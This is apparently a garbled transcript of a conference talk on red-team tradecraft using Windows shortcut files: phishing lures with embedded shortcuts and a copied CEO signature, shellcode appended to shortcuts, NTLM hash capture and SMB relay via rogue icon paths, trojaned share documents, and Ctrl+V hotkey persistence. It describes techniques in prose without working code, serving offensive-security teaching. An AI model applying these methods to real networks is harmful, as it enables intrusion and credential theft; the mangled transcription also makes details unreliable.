T1 12 A "Shortcut" to Red Teaming, Theo Papadopoulos

Hi everybody, thank you very much for being here. I'm really humbled. I will talk about red teaming, in particular red teaming with this file type called Elevate or Windows Orpets files, as you know. A little bit about myself. I'm a senior security consultant in Cross-Digital Science. I know we have a really good name. I'm based in London. I'm a red and purple teamer.

Mostly, most of the assessments I do, there are either infrastructure tests or a retining. And I've been in the Brickshin as an active passive member since early 2000s. I don't know if a couple of you remember these channels, but they're really unique and old.

So in this presentation I want to talk about four phases of left-dealing, in particular fishing campaigns or the initial food hold, how to be the initial food hold, desert harvesting after we came, initial food hold, lateral movement, how to spread inside the network, and a couple of tips about the assistance. But I want to speak for all these four things by using and utilizing Windows Server file.

So there is a trend in phishing campaigns lately, and this is... they are using all ways, like macros. Macros are active for the past 10-15 years, I don't even know. They factor them with good tricks, such as Bowser, for example. You can see all these crazy new attacks and all these crazy compromises lately. But because of the fact that these techniques are old and especially the models, they are very lately, they are very famous attacks. We try, as from the offensive side, we are trying to innovate in a way or try to advance and get out of the normal. Mostly 95% of the attacks are macro-based right now, so in this attack I would describe a new, not a new, an old

slash new attack with only e-objects. So I call this the equation of love. It's a word file, a power cell, and you get cells, I assume. So I'm using for this Only objects as a loop. The benefits you get is you're not getting the usual macro point message which is really, really. It does only show you a secret dialogue saying you want to open the object or not. In my opinion, I think you can create more of these loops without a parcel. We love parcels because memory execution. Easy to script and very easy to extend. And I am using LAT files, a software file as a payload medium. So let me talk about lures. This is a loop I used in a

retina engagement. You can see the text is blurred in the background. You have like a dialogue the text describing the document that says here document you have to double click the lock icon to open the document. But I want you to focus on small and little things. For example, the file icon. You have a document file. This is the payload. This is the delivery file to send to the client. So it has document.has value. But you can see here .lea.x. It's a normal user to think that the file name is truncated, and this is just a random hash value. But the thing is that when we embed an only object inside of a presentation, you get this message. When the user is trying to activate the

only object, you get this message saying you have the file name of the embedded object. And the thing is that because we embedded a software file, which has the extension .lnk, I name the only object document as ID, that has value, dot dot, which means .la. It is the exact same file name in the file. So when the user sees that, he's like, yeah, sure, I can open the file. This is why I opened it in the first place. So we can see that we can convince him to lose I got a very good success rate in this campaign, let's say. And I want to show you something. You see this signature over here? Obviously, I've changed that from this presentation, but I found the signature of the

CEO online. So I've blurred the signature, and I guess it was more convincing for the people to obey. Oh, I had a logo of the company as well.

Let's talk about PowerShell. In PowerShell you can use the dashc or dash command and you can do the whole script code. So essentially you can run code with a single command line. And I'm using a sort of file. How do I use that? So I'm using as a target application, I'm using the full path of PowerShell and as an argument I'm using dashc and the command I want to run. So essentially, the sort with the parameter of PowerShell, you could exit the code. Now, there are some limitations to that. For example, the target is the arguments. The user interface of Windows is limited to 381 bytes. You cannot try more than that in here, the target. But we actually limit programmatically

in an LMP file. It's 1019 bytes. So you can either use

or you can use PowerShell to create a LVK file and you are linked again to this size of whatever you can put here. So in essence we cannot put a lot. You cannot code your own malware and put it there as a code because you are linked to that. Another limitation is that when you call PowerShell from Windows shortcut it invokes PowerShell from

So, users, the attackers continue now the use-safe payloads. So, what does that mean? You have an attacker sending an email to the user with an OLI object and an LK file. The user opens the document and clicks on the OLI object. So you have the LPA file acting as a stager, which communicates with another host and downloads. So it uses PowerShell in order to communicate with another host and downloads the model back to the user and then execute it. I don't know if it's very hard to see that, but it's, in essence, it uses net.web client to download the file and it automatically puts that in memory and you use that process. and the payload that you just found with. But the thing is that

you can obviously use different things like RAID VR or RAN DLL instead of PowerShell, but we love PowerShell. After that, after the execution of the malware, it established a communication channel back to our SQL Server. The thing is that we have a couple of issues with state payloads. First of all, the noise.

Because it's staged, it will request another file from another server. So it produces more noise than a stageless payload in some sense. And the other thing is the staging. As tech testers and as red teamers, we hate staging. You have to really put so much effort in staging that the whole campaign can't fail. And you invested five days in staging, and you fail. So you try to reduce staging as much as possible. This is why I created the LK2OE in Zekker. So what that does,

what I do with that is get the front payload and append it in the end of the shortcut file. And then I'm using PowerShell, I'm calling PowerShell and I'm doing read all bytes to the shortcut itself. And I'm getting the payload that I've embedded in the shortcut file and I'm invoking it in memory straight away. The problem is one, when you call it via a sorted file, it doesn't know where the file is. Because obviously PowerShell is running from its current directory. Thankfully, Office, when anybody embed an only object inside Office, and when the user extracts the only object, it goes automatically to user profile update and temp folder. So thank you very much, Lawrence, for that. Because now I know exactly where my

embedded object is, and I can read my code and invoked. So the thing is that in the short-up arguments we have 309 bytes and this way we can encapsulate a whole payload inside the file and we are inside the limitations of the enemy file but we can invoke whatever form we want in there. This was really cool. I will show you a quick demo that we need

Okay, so I thought I had a failure But essentially I have a payload generated with the Cobalt Strike and I'm using all the other. So what I did is I appended that shellcode in the end of the file. And the thing is that I put some extra code here. You can't see anything, but I put some extra code in order to share with my phishing campaign. later what that piece of code does. So if you remember the previous loon, I was asking the user to click on the file in order to open a new secure document. So essentially this piece of code does that. So you have the document, I'm fast forwarding the process of creating, if you guys want, I can give you the demos

later, but this is essentially how I'm creating the loon. I'm using, because of the fact that when you put an oily object there, there's an icon, I've created a transparent icon and put it as a motherly inside the document. This is my blue. So I'm putting it there, going to the background. Come on faster. Yes. So this finalized document.

down, click on it.

Yes, yes of course I want to open the document, the secure document, clicks open, my word is closing down and you get the secure document opened up and of course you get a shell as well, if you may, yes, that's a shell. way I've encapsulated inside the software the payload, I've encapsulated, weaponized the payload as well to do some more functions like starting down more than 10, open up the secret document. And it was pretty convincing. Of course, it wasn't, you know, this is the secret document to the user, but it was something else that they were expecting. Let me try and practice the presentation.

I want to talk about an impossible scenario that we've never seen in our clients and so if you are a consultant you have never seen that as well, the write-up in network file search, right? So what you can do with that? So essentially you can plant a file inside an SMP search and you can put the item file of the LMP file to

another malicious SMB auth server. This way, whenever someone is trying to access a folder, an SMB server, whatever, explorer.exe is trying to render the icon file and because of the fact that the icon file is on your malicious SMB auth server, you get their netNTLM credentials back.

But I've been in a case where We couldn't crack passes, we couldn't do anything. So we used, I don't know how many of you are familiar with smd-relay? Okay. So smd-relay is a technique. For example, you have a shortcut file that points the user back to you via smd or an RBC. Like the LNK file I was telling you. Automatically, his

windows are trying to authenticate with the user's credentials into my fake SMB off server. With SMB relay, you can say that I'm sitting here in the middle. So imagine that this is the LDK file. The user has just accessed the LDK file. Not accessed, but just rendered it through explorer.dx. So there is an SMB request back to the attacker. And this is me, my fake SMB server. And what I'm doing now is targeting another server that I'm going to get access to. And I'm forwarding the attacker's request back to the server, to the server that I'm targeting. So the target here says, OK, get the challenge, end the element challenge, in order to verify that you are the person

that you're telling. So the attacker gets the NELM challenge and forwards that back to the user. So the user gets a challenge and says, OK, I don't want a challenge. No, actually, I have requested here. I did an S&P request, so now I'm expecting a challenge. So it processes the challenge and sends the response back to us. So we get the response and we forward it back to the attacking server. So the attacking server says, yeah, that's pretty hard to see. all I want from you, you are the one that you are telling me. You are the user that you are impersonating. So he sent us a message saying, okay, I really want to get access to my resources. So the attacker

here, he can say, you know, screw it, I don't want anything from you. So what the attacker did is established a channel, a trust channel between the server that he was targeting and himself. and download the user password at all. And this happened, you can see here in one of my recent engagements. It was the same case, we planted an LK file, you can't see it in months, I assume, but here it is. If you guys know the Spongebob Multi-Relay tool, it's a Naughty tool, you can play around with it. So Responder is the fake SMB server, and MultiRelay is the tool that enables you to do SMB relay attacks. The server didn't have SMB signing, so we were able to relay

the traffic back. Got another mistake on Hust, you know, we can't see much. And, okay, I haven't disclosed some stuff, obviously. So we just used WMine to get back to that server, and that was pretty much it, it was a game over. But everything started with that little Windows or that file. What else we can do? I want to introduce another script that I wrote, which is called allocating doc injector. So what I did is that I noticed when I was doing redeeming engagements in clients, I noticed that there were a couple of people that were accessing specific word documents because this is what they do, that's their word. So I thought I could find these award

documents inside SMB Search that conveniently have access or write access to. So I thought of these people, they are using their data, they award these documents. So I'm targeting a specific group, let's say, in the finance department. I know that these people will import, may not have the same document, for example. So I created a script that does a recursive search inside an ECB server and finds the famous files, the files that have been accessed in the past day or in the past two days, so you can configure it wherever you want. So what I'm doing is creating a shortcut file with the same exact file name as the original file, the same exact size because I'm adding padding to the end of

the file, and the same exact item. Inside the software file, I showed you earlier that I got embedded payload. So my extra code, except of course getting SL, was to invoke the original file. So essentially, the user was just double clicking on the file. He was getting the original file. He was saving stuff from his original file, but I was getting a 7-byte from him.

So let me show you that really quick.

I do not like microse.

So this is a user from the internal compartment. He has his files on the file server. He loves working on that specific file.

So right here, I have compromised one of the systems inside the company and I can see that I have write access into the file as well.

So what I'm doing, I'm doing a

So I'm telling

you the script to search the files in the SMS that have been used in the last day. So it found three files and it found the file as your original the user that I'm targeting was accessing. So

I'm telling the speed to effect with that specific payload. The file search. So this is done. It added the padding. It added the icon files and all that. So the user is opening again the file. He's getting his original file back. And I'm getting a cell you can see here. So that was quite useful. Also I have a bunch of disinfected files. But in essence you don't actually, you don't infect anything. You're just creating stocked files and hiding the original files. It was pretty useful in a some letting exercise we had. So regarding

we've noticed that if... so in a shortcut file you can have hotkeys assigned in your shortcuts but the thing is that Windows allows you by default to use only control and alt for a hotkey but the thing is that if code if you create programmatically a shortcut file you can assign whatever hotkey you like actually everything but the winkey So in this case, I thought, OK, this was very interesting, actually, in VDI kind of editing, because VDI is to have a user logging in a system that is fresh. So we found some roaming profiles that we had access to. So we've planted an LK file inside the user's desktop. And we're planning a way that it was The icon was transparent, there was no

title at all. It was really sneaky. And what we did, we used Ctrl V as a top key. And the thing is that if Explorer.exe starts, it hooks this shortcut genetically into the system. So whenever the user would press Ctrl V, our payload would execute and add a payload to first spawn the shell back to us and then do the actual function which was paste in the user. We ended up having like a pattern session from the same user that he lost that key but it was a really fun way to persist actually. There's another demo I'm going to show you. I don't know if I'm in time.

initialization of the script. So you can see, actually, we simulate that the user restarted his system by giving the next world.dx.

So you can see here that the simulator is doing a copy of this thing. And then by cleaning paste you have a really quick partial window going into the taskbar, minimized, and then you get the text paste. But we get a cell as well from that. That was it. Any questions guys?